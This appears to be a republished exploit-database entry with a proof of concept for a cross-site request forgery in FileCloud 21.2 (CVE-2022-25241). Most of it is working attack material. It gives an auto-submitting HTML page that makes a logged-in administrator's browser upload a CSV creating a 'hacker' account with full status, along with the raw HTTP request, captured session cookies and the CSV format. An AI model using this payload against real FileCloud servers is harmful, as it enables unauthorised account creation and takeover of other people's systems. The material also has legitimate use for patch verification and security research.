[webapps] FileCloud 21.2 - Cross-Site Request Forgery (CSRF)

2 years ago 137
BOOK THIS SPACE FOR AD
ARTICLE AD
# Exploit Title: FileCloud 21.2 - Cross-Site Request Forgery (CSRF) # Date: 2022-02-20 # Exploit Author: Masashi Fujiwara # Vendor Homepage: https://www.filecloud.com/ # Software Link: https://hub.docker.com/r/filecloud/filecloudserver21.2 # Version: All versions of FileCloud prior to 21.3 (Fiexd: version 21.3.0.18447) # Tested on: # OS: Ubuntu 18.04.6 LTS (Docker) # Apache: 2.4.52 # FileCloud: 21.2.4.17315 # CVE: CVE-2022-25241 (https://www.filecloud.com/supportdocs/fcdoc/latest/server/security-advisories/advisory-2022-01-3-threat-of-csrf-via-user-creation) # Conditions 1. Only vulnerable if cookies have samesite set to None (SameSite=None). echo 'define("TONIDOCLOUD_COOKIE_SAME_SITE_TYPE", "None");' >> /var/www/html/config/cloudconfig.php 2. Use https as target url (When cookies set SameSite=None, also set Secure). # PoC (HTML) <html> <head> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-Control" content="no-cache"> <script> function init(){ myFormData = new FormData(); let fileContent = new Blob(["UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified\nhacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES\n"], {type: 'application/vnd.ms-excel'}); myFormData.append("uploadFormElement", fileContent, "user.csv"); fetch("https://192.168.159.129:8443/admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0", { method: "post", body: myFormData, credentials: "include"}); } </script> </head> <body onload="init()"> CSRF PoC for CVE-2022-25241 Creat hacker user with Password1 via CSV file upload. </body> </html> # HTTPS Request POST /admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0 HTTP/1.1 Host: 192.168.159.129:8443 Cookie: X-XSRF-TOKEN-admin=rhedxvo0gullbvzkgwwv; X-XSRF-TOKEN=rhedxvo0gullbvzkgwwv; tonidocloud-au=admin; tonidocloud-as=29352577-cfaa-42e6-80e5-7a304bc78333; tonidocloud-ah=4514fb08f852d2682151efdb938d377734b1e493 Content-Length: 365 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiAXsUsJ2ZV54DFuW Connection: close ------WebKitFormBoundaryiAXsUsJ2ZV54DFuW Content-Disposition: form-data; name="uploadFormElement"; filename="user.csv" Content-Type: application/vnd.ms-excel UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified hacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES ------WebKitFormBoundaryiAXsUsJ2ZV54DFuW-- # CSV file format UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified hacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES
Read Entire Article